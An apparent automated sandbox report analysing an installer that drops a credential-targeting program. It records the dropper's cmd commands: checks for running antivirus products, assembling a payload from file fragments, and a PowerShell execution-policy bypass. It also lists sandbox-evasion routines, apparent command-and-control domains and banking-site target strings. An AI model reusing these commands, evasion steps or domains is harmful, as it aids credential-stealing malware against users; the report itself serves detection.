Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX Jump to behavior

Malware Analysis System Evasion

barindex
Source: C:\Users\user\AppData\Local\Temp\124531\Designing.com Sandbox detection routine: GetForegroundWindow, DecisionNode, Sleep
Source: C:\Users\user\AppData\Local\Temp\124531\Designing.com System information queried: FirmwareTableInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 2030 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 647 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\124531\Designing.com API coverage: 3.7 %
Source: C:\Users\user\AppData\Local\Temp\124531\Designing.com TID: 1576 Thread sleep time: -210000s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6980 Thread sleep count: 2030 > 30 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2800 Thread sleep count: 647 > 30 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 348 Thread sleep time: -922337203685477s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\124531\Designing.com WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Users\user\Desktop\Setup.exe Code function: 0_2_00406301 FindFirstFileW,FindClose, 0_2_00406301
Source: C:\Users\user\Desktop\Setup.exe Code function: 0_2_00406CC7 DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW, 0_2_00406CC7
Source: C:\Users\user\AppData\Local\Temp\124531\Designing.com Code function: 12_2_00E0DC54 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose, 12_2_00E0DC54
Source: C:\Users\user\AppData\Local\Temp\124531\Designing.com Code function: 12_2_00E1A087 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose, 12_2_00E1A087
Source: C:\Users\user\AppData\Local\Temp\124531\Designing.com Code function: 12_2_00E1A1E2 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose, 12_2_00E1A1E2
Source: C:\Users\user\AppData\Local\Temp\124531\Designing.com Code function: 12_2_00E0E472 lstrlenW,GetFileAttributesW,FindFirstFileW,FindClose, 12_2_00E0E472
Source: C:\Users\user\AppData\Local\Temp\124531\Designing.com Code function: 12_2_00E1A570 FindFirstFileW,Sleep,FindNextFileW,FindClose, 12_2_00E1A570
Source: C:\Users\user\AppData\Local\Temp\124531\Designing.com Code function: 12_2_00E166DC FindFirstFileW,FindNextFileW,FindClose, 12_2_00E166DC
Source: C:\Users\user\AppData\Local\Temp\124531\Designing.com Code function: 12_2_00DDC622 FindFirstFileExW, 12_2_00DDC622
Source: C:\Users\user\AppData\Local\Temp\124531\Designing.com Code function: 12_2_00E173D4 FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToSystemTime,FileTimeToSystemTime, 12_2_00E173D4
Source: C:\Users\user\AppData\Local\Temp\124531\Designing.com Code function: 12_2_00E17333 FindFirstFileW,FindClose, 12_2_00E17333
Source: C:\Users\user\AppData\Local\Temp\124531\Designing.com Code function: 12_2_00E0D921 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose, 12_2_00E0D921
Source: C:\Users\user\AppData\Local\Temp\124531\Designing.com Code function: 12_2_00DA5FC8 GetVersionExW,GetCurrentProcess,IsWow64Process,LoadLibraryA,GetProcAddress,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo, 12_2_00DA5FC8
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe File opened: C:\Users\user\AppData\Local\ Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe File opened: C:\Users\user\AppData\ Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe File opened: C:\Users\user\AppData\Local\Temp\124531\ Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe File opened: C:\Users\user\ Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe File opened: C:\Users\user\AppData\Local\Temp\ Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe File opened: C:\Users\user\AppData\Local\Temp\124531 Jump to behavior
Source: Designing.com, 0000000C.00000003.2512466126.000000000429C000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Canara Transaction PasswordVMware20,11696428655x
Source: Designing.com, 0000000C.00000003.2512466126.000000000429C000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: discord.comVMware20,11696428655f
Source: Designing.com, 0000000C.00000003.2512466126.000000000429C000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: interactivebrokers.co.inVMware20,11696428655d
Source: Designing.com, 0000000C.00000003.2512466126.000000000429C000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - COM.HKVMware20,11696428655
Source: Designing.com, 0000000C.00000003.2512390549.00000000042C4000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: - GDCDYNVMware20,11696428655p
Source: Designing.com, 0000000C.00000003.2512466126.000000000429C000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: global block list test formVMware20,11696428655
Source: Designing.com, 0000000C.00000003.2558815498.000000000427D000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: VMCIZM
Source: Designing.com, 0000000C.00000003.2512466126.000000000429C000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Canara Transaction PasswordVMware20,11696428655}
Source: Designing.com, 0000000C.00000003.2787928688.0000000001A6F000.00000004.00000020.00020000.00000000.sdmp, Designing.com, 0000000C.00000003.2788056081.000000000416A000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
Source: Designing.com, 0000000C.00000003.2512466126.000000000429C000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696428655
Source: Designing.com, 0000000C.00000003.2512466126.000000000429C000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Canara Change Transaction PasswordVMware20,11696428655^
Source: Designing.com, 0000000C.00000003.2512466126.000000000429C000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: account.microsoft.com/profileVMware20,11696428655u
Source: Designing.com, 0000000C.00000003.2512466126.000000000429C000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: secure.bankofamerica.comVMware20,11696428655|UE
Source: Designing.com, 0000000C.00000003.2512466126.000000000429C000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: www.interactivebrokers.comVMware20,11696428655}
Source: Designing.com, 0000000C.00000003.2512466126.000000000429C000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696428655p
Source: Designing.com, 0000000C.00000003.2512466126.000000000429C000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - EU WestVMware20,11696428655n
Source: Designing.com, 0000000C.00000003.2512466126.000000000429C000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: outlook.office365.comVMware20,11696428655t
Source: Designing.com, 0000000C.00000003.2512466126.000000000429C000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: microsoft.visualstudio.comVMware20,11696428655x
Source: Designing.com, 0000000C.00000003.2512466126.000000000429C000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Canara Change Transaction PasswordVMware20,11696428655
Source: Designing.com, 0000000C.00000003.2512466126.000000000429C000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: outlook.office.comVMware20,11696428655s
Source: Designing.com, 0000000C.00000003.2512466126.000000000429C000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: www.interactivebrokers.co.inVMware20,11696428655~
Source: Designing.com, 0000000C.00000003.2512466126.000000000429C000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: ms.portal.azure.comVMware20,11696428655
Source: Designing.com, 0000000C.00000003.2512466126.000000000429C000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: AMC password management pageVMware20,11696428655
Source: Designing.com, 0000000C.00000003.2512466126.000000000429C000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: tasks.office.comVMware20,11696428655o
Source: Designing.com, 0000000C.00000003.2512466126.000000000429C000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696428655z
Source: Designing.com, 0000000C.00000003.2512466126.000000000429C000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: turbotax.intuit.comVMware20,11696428655t
Source: Designing.com, 0000000C.00000003.2512466126.000000000429C000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: interactivebrokers.comVMware20,11696428655
Source: Designing.com, 0000000C.00000003.2512466126.000000000429C000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696428655
Source: Designing.com, 0000000C.00000003.2512466126.000000000429C000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: dev.azure.comVMware20,11696428655j
Source: Designing.com, 0000000C.00000003.2512466126.000000000429C000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: netportal.hdfcbank.comVMware20,11696428655
Source: Designing.com, 0000000C.00000003.2512390549.00000000042C4000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: YNVMware
Source: Designing.com, 0000000C.00000003.2512466126.000000000429C000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - HKVMware20,11696428655]
Source: Designing.com, 0000000C.00000003.2512466126.000000000429C000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: bankofamerica.comVMware20,11696428655x
Source: Designing.com, 0000000C.00000003.2512466126.000000000429C000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: trackpan.utiitsl.comVMware20,11696428655h
Source: Designing.com, 0000000C.00000003.2512466126.000000000429C000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Test URL for global passwords blocklistVMware20,11696428655
Source: Designing.com, 0000000C.00000003.2558937419.000000000419A000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: DIPNTGBCHMNVKPUAILXVVKFKXVQUNCFXTBCMTEBSWXPFTMDSDGZKIAUVKOEHSXZJBPMNMGEXTJPAOEMDPTHXRQCVOULRHOXNLLEVOYSUUHJKHUBLKPVUBOWNNNYIVERGXUJXWHARSIBRHIALJWVNJGCJFSWTYNFAKHFKMWIXKIPPQTBKLVLJABTXJJAUPFFIWTLSIBHYUFUKBTZFKZOHSTUPFMPQIOKLVDQRVIJQOGXFVCXVTHXYBRKEFKTAYEVEEJSDTODNKYUKIFEJTGSCOFEGJFXUFFTUDUGNPSDSFNCYGRUOKLHTZSRYLVFROHKDEBPBTMLYGSXGAHMMJCCAHNNTHTJYHYJSYCEYHNZYLYPZZRKQCBEKCIJOMVDKLIMUKHNBXCTWEOWAPIZLIROXKDWVWPAJXRXLLBZPLBODFKBOAAIGTICFSLICMIRMFQVAOXHGTZBMVNEYHPFMVMCIZMYUKDQAJPPKRYFMFYBBZZUDRZUAXHAETNILYTWGZWXKMVYVQPTHACYZNPNUTFPXHLZGFMCFPKGKXZBEMNDEMMSUCIJVEEZVVTNLALWSOOIQWNDNBYFXIMXSYSGIHDKBLTQNHGZBSABJNNCDWHLHGGLULQOHIPDWXBOSOZDGSJICPXZOMIEHQNITIKIXBHUHPYBVDEESQCONQTQTGDIDHFZLNHGHGBNMCJMHPFYAEFORSGPQVZXVNVTODPAYYBGVVJXOQSOXDEYRXFEQHHZXPIKKKAYEDXYKYANMXDXCYRRYSRYIHJTRQILRXNGCFCDERRCTAPDWXXOUTNWBDGRIXGZFWOPASEDDSDMQOIHQDMFZFHVAKVPOTYYQXENYUVBZWKYSVATRNDKTBQJKCBIUQOGVVRSKQRXEZOQAFWIQOTGVRLVGJCXQRXZRDCAHGTXVJAEUKUYANEGPRLWIUCPMSVVQZZMIBQKJKZRROZREPQAHYLRVAFUIGNUGSAQAMAZEHHGHFNSBQQBZOSFYEVJOWSCRJNDOYFYNDGPN
Source: C:\Users\user\AppData\Local\Temp\124531\Designing.com Process information queried: ProcessInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\124531\Designing.com Code function: 12_2_00E1F4FF BlockInput, 12_2_00E1F4FF
Source: C:\Users\user\AppData\Local\Temp\124531\Designing.com Code function: 12_2_00DA338B GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW, 12_2_00DA338B
Source: C:\Users\user\Desktop\Setup.exe Code function: 0_2_00406328 GetModuleHandleA,LoadLibraryA,GetProcAddress, 0_2_00406328
Source: C:\Users\user\AppData\Local\Temp\124531\Designing.com Code function: 12_2_00DC5058 mov eax, dword ptr fs:[00000030h] 12_2_00DC5058
Source: C:\Users\user\AppData\Local\Temp\124531\Designing.com Code function: 12_2_00E020AA GetLengthSid,GetProcessHeap,HeapAlloc,CopySid,GetProcessHeap,HeapFree, 12_2_00E020AA
Source: C:\Windows\SysWOW64\tasklist.exe Process token adjusted: Debug Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe Process token adjusted: Debug Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\124531\Designing.com Code function: 12_2_00DD2992 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 12_2_00DD2992
Source: C:\Users\user\AppData\Local\Temp\124531\Designing.com Code function: 12_2_00DC0BAF IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 12_2_00DC0BAF
Source: C:\Users\user\AppData\Local\Temp\124531\Designing.com Code function: 12_2_00DC0D45 SetUnhandledExceptionFilter, 12_2_00DC0D45
Source: C:\Users\user\AppData\Local\Temp\124531\Designing.com Code function: 12_2_00DC0F91 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 12_2_00DC0F91

HIPS / PFW / Operating System Protection Evasion

barindex
Source: Designing.com, 0000000C.00000003.2787928688.0000000001A6F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: rapeflowwj.lat
Source: Designing.com, 0000000C.00000003.2787928688.0000000001A6F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: crosshuaht.lat
Source: Designing.com, 0000000C.00000003.2787928688.0000000001A6F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: sustainskelet.lat
Source: Designing.com, 0000000C.00000003.2787928688.0000000001A6F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: aspecteirs.lat
Source: Designing.com, 0000000C.00000003.2787928688.0000000001A6F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: energyaffai.lat
Source: Designing.com, 0000000C.00000003.2787928688.0000000001A6F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: necklacebudi.lat
Source: Designing.com, 0000000C.00000003.2787928688.0000000001A6F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: discokeyus.lat
Source: Designing.com, 0000000C.00000003.2787928688.0000000001A6F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: grannyejh.lat
Source: Designing.com, 0000000C.00000003.2787928688.0000000001A6F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: quantitypitt.click
Source: C:\Users\user\AppData\Local\Temp\124531\Designing.com Code function: 12_2_00E01B4D LogonUserW,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcslen,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,GetProcessHeap,HeapFree,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock, 12_2_00E01B4D
Source: C:\Users\user\AppData\Local\Temp\124531\Designing.com Code function: 12_2_00DA338B GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW, 12_2_00DA338B
Source: C:\Users\user\AppData\Local\Temp\124531\Designing.com Code function: 12_2_00E0BBED SendInput,keybd_event, 12_2_00E0BBED
Source: C:\Users\user\AppData\Local\Temp\124531\Designing.com Code function: 12_2_00E0ECD0 mouse_event, 12_2_00E0ECD0
Source: C:\Users\user\Desktop\Setup.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c move Physical Physical.cmd & Physical.cmd Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\tasklist.exe tasklist Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\findstr.exe findstr /I "opssvc wrsa" Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\tasklist.exe tasklist Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\findstr.exe findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth" Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd /c md 124531 Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\extrac32.exe extrac32 /Y /E Lt Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\findstr.exe findstr /V "Heater" Lance Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b ..\Needs + ..\Conclusion + ..\Rendered + ..\French + ..\Selected + ..\Hormone + ..\Rough z Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Users\user\AppData\Local\Temp\124531\Designing.com Designing.com z Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\choice.exe choice /d y /t 5 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\124531\Designing.com Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -exec bypass <!doctype html> <!--[if lt ie 7]> <html class="no-js ie6 oldie" lang="en-us"> <![endif]--> <!--[if ie 7]> <html class="no-js ie7 oldie" lang="en-us"> <![endif]--> <!--[if ie 8]> <html class="no-js ie8 oldie" lang="en-us"> <![endif]--> <!--[if gt ie 8]><!--> <html class="no-js" lang="en-us"> <!--<![endif]--> <head> <title>suspected phishing site | cloudflare</title> <meta charset="utf-8" /> <meta http-equiv="content-type" content="text/html; charset=utf-8" /> <meta http-equiv="x-ua-compatible" content="ie=edge" /> <meta name="robots" content="noindex, nofollow" /> <meta name="viewport" content="width=device-width,initial-scale=1" /> <link rel="stylesheet" id="cf_styles-css" href="/cdn-cgi/styles/cf.errors.css" /> <!--[if lt ie 9]><link rel="stylesheet" id='cf_styles-ie-css' href="/cdn-cgi/styles/cf.errors.ie.css" /><![endif]--> <style>body{margin:0;padding:0}</style> <!--[if gte ie 10]><!--> <script> if (!navigator.cookieenabled) { window.addeventlistener('domcontentloaded', function () { var cookieel = document.getelementbyid('cookie-alert'); cookieel.style.display = 'block'; }) } </script> <!--<![endif]--> </head> <body> <div id="cf-wrapper"> <div class="cf-alert cf-alert-error cf-cookie-error" id="cookie-alert" data-translate="enable_cookies">please enable cookies.</div> <div id="cf-error-details" class="cf-error-details-wrapper"> <div class="cf-section cf-wrapper" style="margin-top: 100px;margin-bottom:200px;"> <div class="cf-columns one"> <div class="cf-column"> <h4 class="cf-text-error"><i class="cf-icon-exclamation-sign" style="background-size: 18px; height: 18px; width: 18px; margin-bottom: 2px;"></i> warning</h4> <h2 style="margin: 16px 0;">suspected phishing</h2> <strong>this website has been reported for potential phishing.</strong> <p>phishing is when a site attempts to steal sensitive information by falsely presenting as a safe source.</p> <div style="display: flex; align-items: center;"> <p> <a href="https://www.cloudflare.com/learning/access-management/phishing-attack/" class="cf-btn" style="background-color: #404040; color: #fff; border: 0;">learn more</a> <form action="/cdn-cgi/phish-bypass" method="get" enctype="text/plain"> <input type="hidden" name="atok" value="bxbnwzevlkhtdosp9hk3kfhiumjhb_d.556jpjn0vjs-1734906557-0.0.1.1-/int_clp_ldr_sha.txt"> <button type="submit" class="cf-btn cf-btn-danger" style="color: #bd2426; background: transparent;" data-translate="dismiss_and_enter">ignore & proceed</button> </form> </p> </div> <
Source: C:\Users\user\AppData\Local\Temp\124531\Designing.com Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -exec bypass <!doctype html> <!--[if lt ie 7]> <html class="no-js ie6 oldie" lang="en-us"> <![endif]--> <!--[if ie 7]> <html class="no-js ie7 oldie" lang="en-us"> <![endif]--> <!--[if ie 8]> <html class="no-js ie8 oldie" lang="en-us"> <![endif]--> <!--[if gt ie 8]><!--> <html class="no-js" lang="en-us"> <!--<![endif]--> <head> <title>suspected phishing site | cloudflare</title> <meta charset="utf-8" /> <meta http-equiv="content-type" content="text/html; charset=utf-8" /> <meta http-equiv="x-ua-compatible" content="ie=edge" /> <meta name="robots" content="noindex, nofollow" /> <meta name="viewport" content="width=device-width,initial-scale=1" /> <link rel="stylesheet" id="cf_styles-css" href="/cdn-cgi/styles/cf.errors.css" /> <!--[if lt ie 9]><link rel="stylesheet" id='cf_styles-ie-css' href="/cdn-cgi/styles/cf.errors.ie.css" /><![endif]--> <style>body{margin:0;padding:0}</style> <!--[if gte ie 10]><!--> <script> if (!navigator.cookieenabled) { window.addeventlistener('domcontentloaded', function () { var cookieel = document.getelementbyid('cookie-alert'); cookieel.style.display = 'block'; }) } </script> <!--<![endif]--> </head> <body> <div id="cf-wrapper"> <div class="cf-alert cf-alert-error cf-cookie-error" id="cookie-alert" data-translate="enable_cookies">please enable cookies.</div> <div id="cf-error-details" class="cf-error-details-wrapper"> <div class="cf-section cf-wrapper" style="margin-top: 100px;margin-bottom:200px;"> <div class="cf-columns one"> <div class="cf-column"> <h4 class="cf-text-error"><i class="cf-icon-exclamation-sign" style="background-size: 18px; height: 18px; width: 18px; margin-bottom: 2px;"></i> warning</h4> <h2 style="margin: 16px 0;">suspected phishing</h2> <strong>this website has been reported for potential phishing.</strong> <p>phishing is when a site attempts to steal sensitive information by falsely presenting as a safe source.</p> <div style="display: flex; align-items: center;"> <p> <a href="https://www.cloudflare.com/learning/access-management/phishing-attack/" class="cf-btn" style="background-color: #404040; color: #fff; border: 0;">learn more</a> <form action="/cdn-cgi/phish-bypass" method="get" enctype="text/plain"> <input type="hidden" name="atok" value="bxbnwzevlkhtdosp9hk3kfhiumjhb_d.556jpjn0vjs-1734906557-0.0.1.1-/int_clp_ldr_sha.txt"> <button type="submit" class="cf-btn cf-btn-danger" style="color: #bd2426; background: transparent;" data-translate="dismiss_and_enter">ignore & proceed</button> </form> </p> </div> < Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\124531\Designing.com Code function: 12_2_00E014AE GetSecurityDescriptorDacl,GetAclInformation,GetLengthSid,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree, 12_2_00E014AE
Source: C:\Users\user\AppData\Local\Temp\124531\Designing.com Code function: 12_2_00E01FB0 AllocateAndInitializeSid,CheckTokenMembership,FreeSid, 12_2_00E01FB0
